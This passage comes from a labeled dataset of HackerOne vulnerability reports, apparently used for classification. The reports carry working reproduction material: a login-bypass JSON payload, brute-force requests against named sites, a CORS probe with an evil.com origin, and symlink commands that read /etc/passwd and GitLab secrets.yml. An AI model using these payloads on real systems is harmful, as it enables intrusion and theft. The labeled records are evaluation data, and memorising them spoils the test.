domain.\n\n[Original HackerOne report](https://hackerone.com/reports/1632921)\n\n[Node.js Blog](https://nodejs.org/en/blog/vulnerability/september-2022-security-releases/#dns-rebinding-in-inspect-insufficient-fix-of-cve-2022-32212-affecting-macos-devices-high-cve-2022-32212-cve-2018-7160)\n\n## Impact\n\nAttacker with access to a compromised DNS server or the ability to spoof its responses can gain access to the Node.js debugger, which can result in remote code execution.", "source": "hackerone", "timestamp": "2023-01-12", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "f22223c0cecc233d5b32", "text": "[Business Logic Errors] CVE-2022-32208: FTP-KRB bad message verification\n\n## Summary:\nlibcurl handles `gss_unwrap` `GSS_S_BAD_SIG` error incorrectly. This enables malicious attacker to inject arbitrary FTP server responses to GSSAPI protected FTP control connection and/or make the client consume unrelated heap memory as a FTP command response.\n\nThe defective `krb5_decode` function is as follows:\n ```\nstatic int\nkrb5_decode(void *app_data, void *buf, int len,\n int level UNUSED_PARAM,\n struct connectdata *conn UNUSED_PARAM)\n{\n gss_ctx_id_t *context = app_data;\n OM_uint32 maj, min;\n gss_buffer_desc enc, dec;\n\n (void)level;\n (void)conn;\n\n enc.value = buf;\n enc.length = len;\n maj = gss_unwrap(&min, *context, &enc, &dec, NULL, NULL);\n if(maj != GSS_S_COMPLETE) {\n if(len >= 4)\n strcpy(buf, \"599 \");\n return -1;\n }\n\n memcpy(buf, dec.value, dec.length);\n len = curlx_uztosi(dec.length);\n gss_release_buffer(&min, &dec);\n\n return len;\n}\n```\nNote how `read_data` function will set the `buf->size` to result of the decode operation as-is without considering possible `-1` return code and that size `buf->size` is of type `size_t`:\n```\n/* Types needed for krb5-ftp connections */\nstruct krb5buffer {\n void *data;\n size_t size;\n size_t index;\n BIT(eof_flag);\n};\n```\n```\nstatic CURLcode read_data(struct connectdata *conn,\n curl_socket_t fd,\n struct krb5buffer *buf)\n{\n int len;\n CURLcode result;\n\n result = socket_read(fd, &len, sizeof(len));\n if(result)\n return result;\n\n if(len) {\n /* only realloc if there was a length */\n len = ntohl(len);\n buf->data = Curl_saferealloc(buf->data, len);\n }\n if(!len || !buf->data)\n return CURLE_OUT_OF_MEMORY;\n\n result = socket_read(fd, buf->data, len);\n if(result)\n return result;\n buf->size = conn->mech->decode(conn->app_data, buf->data, len,\n conn->data_prot, conn);\n buf->index = 0;\n return CURLE_OK;\n}\n```\nWhen `gss_unwrap` returns an error the `krb5_decode` code attempts to erase the buffer by prefixing the buffer with `599 \\0`. However, this doesn't take into account the case that arbitrary number of bytes can be read by `read_data` function. Hence the buffer may contain multiple lines not just one. The attacker merely needs to find a position in the FTP protocol where ftpcode `599` doesn't lead to connection termination to take over the GSSAPI protected FTP session control channel. From that point onwards the server responses can be forged by the attacker (but need to be predicted, as the attacker has no direct knowledge of the actual commands sent to the server).\n\nIt's also notable that the any `gss_unwrap` error leading to `-1` size will lead to `sec_recv` consuming unallocated heap buffer via `buffer_read` if the reading application keeps reading more data:\n```\nstatic size_t\nbuffer_read(struct krb5buffer *buf, void *data, size_t len)\n{\n if(buf->size - buf->index < len)\n len = buf->size - buf->index;\n memcpy(data, (char *)buf->data + buf->index, len);\n buf->index += len;\n return len;\n}\n```\nThis can lead to disclosure of confidential information from the heap - depending on application this may reveal application secrets to the user (for example via verbose error messages). This is a local leak however, so this impact is only meaningful if the information in heap is normally hidden from the user.\n\n## Impact\n\n- Injection of arbitrary FTP control channel server responses to supposedly GSSAPI protected FTP session.\n- Potential leak of local heap memory to client.\n\nThe practical impact of this vulnerability is rather low, considering the rarity of Kerberos FTP and requirement of either man in the middle or victim connecting to malicious server.", "source": "hackerone", "timestamp": "2022-06-27", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "1415e90982ba6e194b7e", "text": "[Improper Restriction of Authentication Attempts] blog/wp-json/wp/v2/users FILE is enable it will used for bruteforce attack the admin panel at blog/wp-login.php\n\nhello team,\n\nThe file v2/users at https://happynumbers.com/blog/wp-json/wp/v2/users/ is enabled and this give the attacker many users names like ```admin``` ```adam``` ```Alexa``` ```Alina``` ```Danny``` ```David``` ```Fedor``` ```Olga``` to use them at https://happynumbers.com/blog/wp-login.php on BRUTE FORCE attack ( because no protection against this attack)\n\n##POC:\n\n1- Go to https://happynumbers.com/blog/wp-json/wp/v2/users/ \n2- pic the ```admin``` username or any other name\n3- go to https://happynumbers.com/blog/wp-login.php and put the ```admin``` on username fields and put any password\n4- intercept the request with burpsuite and send the request to Intruder and set the payload on ```pwd``` parameter and start the brute force attack , the request will be like that:\n```\nPOST /blog/wp-login.php HTTP/2\nHost: happynumbers.com\nCookie: wordpress_test_cookie=WP%20Cookie%20check; _happy-numbers_session=ZUFYZTNURnM2cGpWRXAzRUllaUFLQzl3a0I0YUpPaWFOSWxkaTd4NHJhRWJRZFRHOGQ5VmMwc3NnM2xjUWtoUVNsSElCeHVMdURJNnJ5ZStJZFlkUFpZeXNlWUhwR1dybXBpWnVBdmpTbXN6d1VqOW9FYlJ1Z2E3VlNxS3BVaUNON2VWQ3FreDA2Rk9ySVNEQ3IzWmJ4NUpTcFY5VE5xUllzUW1FcG03eTBxMXFzUnIvelFjd0dPMXJicDVvMlJTLS1wbVhUcGorOUxQQ0ZQWmZnMHpBQVVRPT0%3D--6ace53f5da4342db8c60454a98fa5f587d271556\nContent-Length: 125\nCache-Control: max-age=0\nSec-Ch-Ua: \"Google Chrome\";v=\"95\", \"Chromium\";v=\"95\", \";Not A Brand\";v=\"99\"\nSec-Ch-Ua-Mobile: ?0\nSec-Ch-Ua-Platform: \"Windows\"\nUpgrade-Insecure-Requests: 1\nOrigin: https://happynumbers.com\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nReferer: https://happynumbers.com/blog/wp-login.php?redirect_to=http%3A%2F%2Fhappynumbers-blog.herokuapp.com%2Fwp-admin%2F&reauth=1\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9,ar;q=0.8\n\nlog=admin&pwd=admina§d§min&wp-submit=Log+In&redirect_to=http%3A%2F%2Fhappynumbers-blog.herokuapp.com%2Fwp-admin%2F&testcookie=1\n```\n5- you still get this msg on the response ```The password you entered for the username admin is incorrect. ```\n6- i tried more than 100 requests and im not get blocking \n\n\n##screen shoot attached\n\n## Impact\n\nInformation Disclosure , may lead to login to the admin panel", "source": "hackerone", "timestamp": "2022-01-09", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "928ac4d28c99c141e27f", "text": "[Resource Injection] Object injection in `stripe-billing-typographic` GitHub project via /auth/login\n\n## Summary:\nIt is possible to use an object injection failure to achieve a sql injection, where attacker uses the means to bypass authentication, requiring only a valid password within the database.\n\nThe vulnerable code is: https://github.com/stripe/stripe-billing-typographic\n\nFor a failure to occur, it is necessary that the environment is configuring with the mysql database. \n\nThe same scenario is seen in the demonstration environment: https://typographic.io/\n\n## Steps To Reproduce:\n\n 1. Register a simple user in the application, with a password at your desire. Ex:\n```\nuser: test@test.com\npassword:123\n```\n 2. Send a request to /auth/login like this:\n```\nPOST /auth/login\n\n{\"email\":{\"email\":1},\"password\":\"1234\"}\n```\n 3. You will then see that the login was performed without the need to provide a valid user!\n\n{F1287585}\n\n\n## Supporting Material/References:\nWell, the failure occurs due to the possibility of an object reaching the query, which will be handled by a dependency called sqlstring, performing some scapes, where it will cause a confusion to the query.\n\nSqlstring will handle {,} replacing with `. \nSo your login query will be:\n```\nSELECT * FROM `accounts` WHERE `email`=`email`=1\n```\nThe sql string library is a dependency on the mysql library, which is used by knex.\n\n## Mitigation\n\nIs a simple step, use JSON.stringfy e resolve your problem, because JSON.stringfy will transform the malicious object into a string, preventing treatment during a query.\n\n## Impact\n\nThis vulnerability to the applied scenario makes it easier for the attacker to acquire accounts, as the attacker only needs to discover a valid password to gain access to the victim's account.", "source": "hackerone", "timestamp": "2023-03-06", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "0895e2844721463d2add", "text": "[Unknown] No Rate Limit On Forgot Password Page\n\n## Summary:\nAbout No rate Limiting Vulnerability:-\nNo rate limit is a flaw that doesn't limit the no. of attempts one makes on a website server to extract data.It is a vulnerability which can prove to be critical when misused by attackers.\n\n## Description:-\nI have identified that when using forget password for account, The request has no rate limiting through which i can send multiple request to the server in order to guess the correct username after that in security question also there is no rate limiting set through which i can able to guess the answer as well which can be lead to account takeover.\n\n## Steps To Reproduce:\n\n 1. Step 1-Go To This Link https://ctr.tva.com/Login.aspx and click on forget password page.\n 2. Intercept This Request In Burp and send it to intruder. \n 3. add mark on username and set payload and click on start attack.\n 4.as you can see i can able to send multiple request to the server in order to guess the correct username.\n\n## Supporting Material/References:\nhttps://www.geeksforgeeks.org/no-rate-limiting-flaw-in-cyber-security\n\n## Impact\n\nAs rate limiting is not set in forget password page and security question page i can able to perform brute force attack to enumerate valid username and correct answer for security question which can lead to breaking of authentication or can even lead to account takeover.", "source": "hackerone", "timestamp": "2023-09-11", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "9c06c885441b630fd227", "text": "[Cleartext Transmission of Sensitive Information] CVE-2022-43551: Another HSTS bypass via IDN\n\nOriginal Report:https://hackerone.com/reports/1755083\n\n## Impact\n\nHSTS bypass.", "source": "hackerone", "timestamp": "2023-02-03", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "42bc352978eee0d0ccc3", "text": "Electrolink FM/DAB/TV Transmitter SuperAdmin Hidden Functionality\n\nSeverity: high", "source": "zeroscience", "timestamp": "2023-09-30", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "8f5b4a4320bd5d4f7392", "text": "[Unknown] user can bypass password enforcement when federated sharing is enabled\n\nIf the admin forces password for link shares and federated shares are enabled, users can bypass this enforcement. Tested with Nextcloud 18.0.3\n\nSteps to reproduce:\n - enable password enforcement for link shares as admin\n - as user1 create a link share with password\n - open the link share in a separate browser session and enter the password\n - use \"add to your nextcloud\" and add the file to another nextcloud or the same nextcloud with another user.\n - login as user1, now there is a new link share without password protection. The gui shows that password is enforced, but the link has no password protection\n - copy the new created link\n\nAdditional information:\nI think the problem is, that if the share is added by \"add to your nextcloud\", the wrong share_type is set. federated shares normally use the value 6, but the value 3 is set.\n\nAdditional problem:\nUsers can bruteforce link-ids. okay this is something that takes a long time because of 62^15 combinations. But if a forced password is used, every try is protected by the brute-force protection. Just testing links isn't protected by the bruteforce protection I think. Maybe someone just gets read access to the database (or a backup of this). In this case all federated shares are leaked.\n\nSo, if password is forced for link shares, enabling federated shares will lower the security level.\n\nWhy is there no additional password or public/private-keypair used for establishing and accessing federated shares?\n\n## Impact\n\nThis is something that can be used by registered users to bypass the sharing policy.\nAn attacker that gets read access to the database can access all federated shares.", "source": "hackerone", "timestamp": "2022-06-01", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "32fc4f2fb4928bca06c0", "text": "[Authentication Bypass by Primary Weakness] CVE-2023-27538: SSH connection too eager reuse still\n\n## Summary:\nThere's a check if SSH keys match between new and existing connection when considering reuse. This check is broken due to wrong comparison:\n`#define PROTO_FAMILY_SSH (CURLPROTO_SCP|CURLPROTO_SFTP)`\n...\n`else if(get_protocol_family(needle->handler) == PROTO_FAMILY_SSH) {`\nThis never matches as handler family is either `CURLPROTO_SCP` or `CURLPROTO_SFTP`.\n\n## Remediation\n\n* Make the code:\n`else if(get_protocol_family(needle->handler) & PROTO_FAMILY_SSH) {`\n\n## Steps To Reproduce:\n\n 1. Make two connections to the same host with different ssh keys\n\n## Impact\n\nConnection reuse when different ssh keys are used.", "source": "hackerone", "timestamp": "2023-03-22", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "de9c3da17e6fc33a6d53", "text": "[Privilege Escalation] subdomain takeover at status.hosting24.com\n\n**Domain**\n>https://status.hosting24.com\n\n**PoC**\n>https://status.hosting24.com\n\n## Impact\n\nstealing user cookies and informations", "source": "hackerone", "timestamp": "2022-05-16", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "393a38aaa88e251680a0", "text": "[Unknown] CORS Misconfiguration on vanillaforums.com\n\n**Summary:**\nAn cross-origin resource sharing (CORS) policy controls whether and how content running on other domains can perform two-way interaction with the domain that publishes the policy. The policy is fine-grained and can apply access controls per-request based on the URL and other features of the request. If the site specifies the header Access-Control-Allow-Credentials: true, third-party sites may be able to carry out privileged actions and retrieve sensitive information. This bug could be used to steal users information or force the user to execute unwanted actions. As long that a legit and logged in user is lure to access a attacker controlled HTML page\n**Description:**\nCORS misconfiguration is found on vanillaforums.com as `Access-Control-Allow-Credentials: true`.\n## Steps to reproduce:\n\n1.visit [vanillaforms site](http://vanillaforums.com/).\n2. Request:\n```\nGET /wp-json HTTP/1.1\nHost: vanillaforums.com\nCookie: _vwo_uuid_v2=D2C17FB17DC81C379C832A0EDAD6B262C|1041f46ed8870bf7a805896fe658b98f; _ga=GA1.2.2133458971.1648791765; _gid=GA1.2.798514438.1648791765; _vis_opt_s=1%7C; _fbp=fb.1.1648791765308.1582273532; _gd_visitor=2007eaf6-5e90-4849-818d-c4f2e29fd209; _gd_session=e61fd9a6-07c1-4631-874e-719a1ca3a00e; _gd_svisitor=d487d3177d2c0000d5904662da000000bf8e1200; _an_uid=2530911987610499259; __hstc=125439637.938b2fb7675932b4de7b161c45b12cef.1648791767956.1648791767956.1648791767956.1; hubspotutk=938b2fb7675932b4de7b161c45b12cef; messagesUtk=c620a59d9b2441e28c027f443a66b851; _gcl_au=1.1.243191688.1648791769; __hs_opt_out=no; __hs_initial_opt_in=true; __hssc=125439637.2.1648791767956\nSec-Ch-Ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"90\"\nSec-Ch-Ua-Mobile: ?0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\nOrigin: evil.com\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nSec-Fetch-Site: none\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\nConnection: close\n```\nyou get an response like:\n```\nHTTP/2 200 OK\nDate: Fri, 01 Apr 2022 06:20:32 GMT\nContent-Type: application/json; charset=UTF-8\nVary: Accept-Encoding\nVary: Accept-Encoding\nX-Robots-Tag: noindex\nLink: ; rel=\"https://api.w.org/\"\nX-Content-Type-Options: nosniff\nAccess-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link\nAccess-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type\nAllow: GET\nAccess-Control-Allow-Origin: http://evil.com\nAccess-Control-Allow-Methods: OPTIONS, GET, POST, PUT, PATCH, DELETE\nAccess-Control-Allow-Credentials: true\nX-Powered-By: WP Engine\nX-Cacheable: SHORT\nVary: Accept-Encoding,Cookie\nCache-Control: max-age=600, must-revalidate\nX-Cache: HIT: 1\nX-Cache-Group: normal\nCf-Cache-Status: DYNAMIC\nExpect-Ct: max-age=604800, report-uri=\"https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct\"\nServer: cloudflare\nCf-Ray: 6f4f38303ea13972-MAA\nAlt-Svc: h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400\n\nand some jSON code to follow...\n```\nNote:by adding the [Like](https://vanillaforums.com/wp-json/) repose from the page in the following code developed it can be exploded \n```\n\n\n \n \n \n \n
    \n > ```Do Intercept >>Response to this request``` and then Forward this request\n 5. Change ```status``` value from ```false``` to ```true``` and Forward the request\n\n```\nHTTP/2 200 OK\nCache-Control: no-cache,no-cache,no-store\nPragma: no-cache,no-cache\nContent-Type: application/json; charset=utf-8\nExpires: -1\nServer: \nX-Content-Type-Options: nosniff\nX-Xss-Protection: 1; mode=block\nReferrer-Policy: no-referrer\nStrict-Transport-Security: max-age=31536000; includeSubDomains;preload\nX-Frame-Options: DENY\nX-Ua-Compatible: IE=Edge\nContent-Security-Policy: script-src 'self'; object-src 'self'; frame-ancestors 'none'\nExpect-Ct: enforce, max-age=7776000, report-uri='https://connectnb.ups.com/'\nAccess-Control-Allow-Origin: https://connectnb.ups.com/\nAccess-Control-Allow-Headers: Accept, Content-Type, Origin\nAccess-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS\nDate: Thu, 24 Feb 2022 03:59:01 GMT\nContent-Length: 71\n\n{\"status\":true,\"errorMessage\":\"Username and Password does not match.\"}\n```\n\n\n 6. Now open ```Report``` , ```Change Password``` and ```Process Return``` and then Turn off the intercept of the Burp\n\n{F1631144}\n{F1631140}\n{F1631141}\n\n## Supporting Material/References:\n\nPOC Video\n\n{F1631161}\n\n## Impact\n\nThe attacker can \n- login as an admin by bypassing the authentication \n- change the admin password to takeove the admin account\n- View the company's reports and delete them [1066 Report]\n- View processReturn", "source": "hackerone", "timestamp": "2022-06-20", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "ca437c78a44e5eb08f12", "text": "[Double Free] CVE-2023-27537: HSTS double-free\n\nOriginal Report:https://hackerone.com/reports/1897203\n\n## Impact\n\nDouble-free", "source": "hackerone", "timestamp": "2023-03-23", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "a2e877d450008642b513", "text": "[Improper Authentication - Generic] Exposure of a valid Gitlab-Workhorse JWT leading to various bad things\n\n### Summary\n\nUsing the **State** Uploading API we could potentially do a bad thing:\n- Bypass `Gitlab::Workhorse.verify_api_request!`\n\nThis was due to the fact that Workhorse clean the URL before passing it to Rails, this is elaborated in #923027. \nand **State** Api read `request.body` to append it as a file!\n\n**lib/api/terraform/state.rb**\n```ruby\n desc 'Add a new terraform state or update an existing one'\n route_setting :authentication, basic_auth_personal_access_token: true, job_token_allowed: :basic_auth\n post do\n authorize! :admin_terraform_state, user_project\n\n data = request.body.read\n```\nThere is one very interestingly specific exploit which I've found in my researching on Geo is to un-authorizing push to any readable repository\nSince Gitlab has a pre-receive hook which check the permission even if attacker is able to bypass the Access Control in Rails part but here is pretty interesting stuff in EE:\n\n**ee/app/controllers/ee/repositories/git_http_controller.rb**\n```ruby\ndef user\n super || geo_push_user&.user\n end\n\n def geo_push_user\n @geo_push_user ||= ::Geo::PushUser.new_from_headers(request.headers)\n end\n```\nWhich mean the `user` for passing to Gitaly will be `user` from `geo_push_user`\n\n```ruby\n def self.new_from_headers(headers)\n return unless needed_headers_provided?(headers)\n\n new(headers['Geo-GL-Id'])\n end\n\n def user\n @user ||= identify_using_ssh_key(gl_id)\n end\n```\n\nTracing from this we will reach here\n\n```ruby\n def identify_using_ssh_key(identifier)\n key_id = identifier.gsub(\"key-\", \"\")\n\n identify_with_cache(:ssh_key, key_id) do\n User.find_by_ssh_key_id(key_id)\n end\n end\n\n```\nThis means: I am able to authenticate as any **SSH-KEY** by just passing the ID of the Key to headers `Geo-GL-Id`\n\n### Steps to reproduce\n\nSpliting into 2 parts, **GEO** is not neccessary for the PoC but **EE** Plan should be.\n\n**Exposing Gitlab JWT**\n\n- Set up an Project\n- Get a Personal Access Token of the user\n- Send the following request \n\n```http\nPOST /api/v4/projects//terraform/state/%2e%2e%2f%2e%2e%2fwikis%2fattachments?serial=1 HTTP/1.1\nHost: gitlab3.example.vm\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0\nPrivate-Token: \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryTdc8IV2vpQMwv6jW\nCookie: experimentation_subject_id=eyJfcmFpbHMiOnsibWVzc2FnZSI6IklqZzBOVE14T1RWbUxXRTBZalF0TkRBek1pMWhaVGRpTFRNM05tSTBNalExWlRjNVl5ST0iLCJleHAiOm51bGwsInB1ciI6ImNvb2tpZS5leHBlcmltZW50YXRpb25fc3ViamVjdF9pZCJ9fQ%3D%3D--64479e11c45d9e17bdf950f749ab3fa8b3ee278a; _gitlab_session=b50156c1d05716e1bebbfd448f38b890; known_sign_in=SkJhSDV0MWRqaFAyaFpZQlNCM3Vqbmg5UkxsZ0hyTHVWSlNPanNZT2YxbVQ4M2xvaUxLNkZabE9zeHdZOHlFQnloTWJxWGdPMWtKbUlkV25TNGFHRFFQVDlpdTRtUFpnTnZyd2xCTk5sS2hNRVBmODEvc2RiYVovT2RjTWgzWFQtLTY4ZEl1bXA4ZnVETVFrYnUrZVhaR1E9PQ%3D%3D--34ce6946f382229b6135333906ad3fd10ecbb284; sidebar_collapsed=false; event_filter=all\nUpgrade-Insecure-Requests: 1\nContent-Length: 316\n\n------WebKitFormBoundaryTdc8IV2vpQMwv6jW\nContent-Disposition: form-data; name=\"import_url\"\n\nhttp://gitlab3.example.vm/test/ttt\n------WebKitFormBoundaryTdc8IV2vpQMwv6jW\nContent-Disposition: form-data; name=\"mirror\"; filename=test.txt\nContent-Type: image/jpg\n\ntrue\n------WebKitFormBoundaryTdc8IV2vpQMwv6jW--\n```\n\n3. Later on send the following request \n\n```http\nGET /api/v4/projects/6/terraform/state/%2e%2e%2f%2e HTTP/1.1\nHost: gitlab3.example.vm\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0\nPrivate-Token: \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection:", "source": "hackerone", "timestamp": "2022-07-05", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "4c451db297ab81c4ced3", "text": "[Improper Restriction of Authentication Attempts] Missing brute force protection on login page on www.acronis.com\n\nGood Night Team and a Merry Christmas!!!\nThe failure occurs as follows, to change the email the user has to click on a link sent to their email to confirm the change.if the user creates a new account with this email before clicking on the change email link,one second link is sent to your email to confirm your new account.if the user now clicks on the change email link, it will no longer be possible to confirm the change because the email is already in use and he will be redirected to a different login page from the original ,this login page has no rate limiting and is vulnerable to brute force attack.\nSteps to reproduce;1:Log in to your account at account.acronis.com\n2:Navigate to PROFILE -> Change email\n3:Enter an email address that is not being used in another account and click -> Save changes\n4:A message with a link to confirm the change will be sent to your email, Ignore the message for now, do not click on the link now\n5:Now create a new account using this email address\n6:You will receive another message in your email with a link to confirm your new account,Ignore the second message too,don't click.\n7:Now log out\n8:Now go to your email inbox and click on the link you received in the first message to confirm email change\n9:By clicking on the link you will be redirected to a login page different from the original\n10:Enter a random email and password and click login, intercept the request with BurpSuite and initiate the brute force attack\n11: For wrong passwords, the code 302 is displayed, and when the password is found, the code 1508 is displayed\n\n## Impact\n\nThe victim will have their account hacked by brute force attack because the changed login page has no rate limitation", "source": "hackerone", "timestamp": "2023-08-30", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "24aba4b225b5db772a6b", "text": "[Path Traversal] Arbitrary file read via the bulk imports UploadsPipeline\n\n### Summary\n\nThe bulk imports api does not remove symlinks when untaring the uploads.tar.gz file, allowing arbitrary files to be read and uploaded when importing a group.\n\nWhen a group has uploads (such as markdown attachments), an `uploads.tar.gz` file will be downloaded and extracted in the `UploadsPipeline`:\nhttps://gitlab.com/gitlab-org/gitlab/-/blob/v14.6.0-ee/lib/bulk_imports/common/pipelines/uploads_pipeline.rb#L15\n```ruby\n def extract(context)\n download_service(tmp_dir, context).execute\n untar_zxf(archive: File.join(tmp_dir, FILENAME), dir: tmp_dir)\n upload_file_paths = Dir.glob(File.join(tmp_dir, '**', '*'))\n\n BulkImports::Pipeline::ExtractedData.new(data: upload_file_paths)\n end\n```\n\nSince `untar_zxf` only changes the permissions, any symlinks that are extracted from the tar will remain and be added to the list of file paths. When `load` is called, the symlinks will be followed and used as the content for the new file:\n\nhttps://gitlab.com/gitlab-org/gitlab/-/blob/v14.6.0-ee/lib/bulk_imports/common/pipelines/uploads_pipeline.rb#L23\n```ruby\n def load(context, file_path)\n avatar_path = AVATAR_PATTERN.match(file_path)\n\n return save_avatar(file_path) if avatar_path\n\n dynamic_path = file_uploader.extract_dynamic_path(file_path)\n\n return unless dynamic_path\n return if File.directory?(file_path)\n\n named_captures = dynamic_path.named_captures.symbolize_keys\n\n UploadService.new(context.portable, File.open(file_path, 'r'), file_uploader, **named_captures).execute\n end\n``` \n\nThis can be used to read any file that the git user has read access to such as secrets.yml or other sensitive files.\n\n### Steps to reproduce\n\n1. Create a new group on gitlab.com\n1. Create a new milestone and upload a file `passwd` with any content into the description\n1. Make note of the upload secret (the 32 byte hash in the path)\n1. Run the following commands to make a tar file, using the hash from above\n ```bash\nmkdir ./d3209c811fee407218bff7cb3b4333e6\nln -s /etc/passwd ./d3209c811fee407218bff7cb3b4333e6/passwd\nln -s /srv/gitlab/config/secrets.yml ./d3209c811fee407218bff7cb3b4333e6/secrets.yml\ntar cvzf uploads.tar.gz ./d3209c811fee407218bff7cb3b4333e6\n ```\n\n1. Save the following simple proxy server as `api.py` and run it with `FLASK_APP=api flask run`, this will replace the `uploads.tar.gz` with a custom one: {F1565789}\n1. Start [ngrok](https://ngrok.com/) so that it's externally accessible: `ngrok http 5000`\n1. Create a new access token at https://gitlab.com/-/profile/personal_access_tokens\n1. Create a new group, this time choose import group\n1. Enter the https ngrok url and the token you just created\n1. Select the group you initially created and choose a new name\n1. Once the import has complete, view the milestone and click the passwd link\n1. You will see the passwd file from the gitlab server\n1. Copy the link and change `passwd` to `secrets.yml` and you should be able to download the secrets file\n\n\n### Impact\n\nA user with access to import a group on gitlab can read arbitrary files on the gitlab server\n\n### Examples\n\nExample with `passwd` and `secrets.yml` attached:\nhttps://gitlab.com/groups/group_to_import_1/-/milestones/1\nhttps://gitlab.com/groups/group_to_import_1/-/uploads/d3209c811fee407218bff7cb3b4333e6/passwd\nhttps://gitlab.com/groups/group_to_import_1/-/uploads/d3209c811fee407218bff7cb3b4333e6/secrets.yml\n\n### What is the current *bug* behavior?\nSymlinks are not removed or filtered when the `UploadsPipeline` is run for the bulk imports api\n\n### What is the expected *correct* behavior?\nSymlinks should be removed similar to the project import\n\n### Relevant logs and/or screenshots\n/etc/passwd file:\n```\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman", "source": "hackerone", "timestamp": "2022-03-21", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "23d11a587a6c6fc75793", "text": "[Expected Behavior Violation] CVE-2022-32221: POST following PUT confusion\n\n## Summary:\nThe bug I submitted at https://github.com/curl/curl/issues/9507 can have at least a few unintended security issues:\n- Information Disclosure: this bug causes an HTTP PUT to occur when the user intends for an HTTP POST to occur. The user, who intended an HTTP POST, expects the POSTed information to come from CURLOPT_POSTFIELDS. However, as an HTTP PUT is performed instead, the data that is PUT comes from a buffer specified in CURLOPT_READDATA, which may be sensitive information intended for an entirely different host (host1.com below). If CURLOPT_READDATA is not specified, this data could come from stdin!\n- Use after free: using the description above, if the user had already freed the data specified in CURLOPT_READDATA, then the unintended HTTP PUT (which was intended to be an HTTP POST) would attempt to read the freed data specified in CURLOPT_READDATA.\n\n## Steps To Reproduce:\nThe following code is similar to the code I posted at https://github.com/curl/curl/issues/9507, but now highlights the potential security issues (which I did not think wise to disclose on GitHub):\n\n```\n#include \n#include \n#include \n\ntypedef struct\n{\n char *buf;\n size_t len;\n} put_buffer;\n\nstatic size_t put_callback(char *ptr, size_t size, size_t nmemb, void *stream)\n{\n put_buffer *putdata = (put_buffer *)stream;\n size_t totalsize = size * nmemb;\n size_t tocopy = (putdata->len < totalsize) ? putdata->len : totalsize;\n memcpy(ptr, putdata->buf, tocopy);\n putdata->len -= tocopy;\n putdata->buf += tocopy;\n return tocopy;\n}\n\nint main()\n{\n CURL *curl = NULL;\n put_buffer pbuf = {};\n char *otherdata = \"This is some other data\";\n\n curl_global_init(CURL_GLOBAL_DEFAULT);\n\n curl = curl_easy_init();\n\n // PUT\n curl_easy_setopt(curl, CURLOPT_UPLOAD, 1L);\n curl_easy_setopt(curl, CURLOPT_READFUNCTION, put_callback);\n pbuf.buf = strdup(\"This is highly secret and sensitive data\");\n pbuf.len = strlen(pbuf.buf);\n curl_easy_setopt(curl, CURLOPT_READDATA, &pbuf);\n curl_easy_setopt(curl, CURLOPT_INFILESIZE, pbuf.len);\n curl_easy_setopt(curl, CURLOPT_URL, \"http://host1.com/putsecretdata\");\n curl_easy_perform(curl);\n\n // Without this line, a PUT instead of a POST will be sent below (this is a bug in libcurl)\n //curl_easy_setopt(curl, CURLOPT_UPLOAD, 0L);\n\n // Without this line, the POST below will send \"This is highly secret and sensitive data\"\n // when instead the user intended to send \"This is some other data\"\n // With this line, the program will attempt to use freed data, causing a segfault or any number\n // of potential exploits.\n //free(pbuf.buf);\n\n // POST (will be a PUT without the line just above)\n curl_easy_setopt(curl, 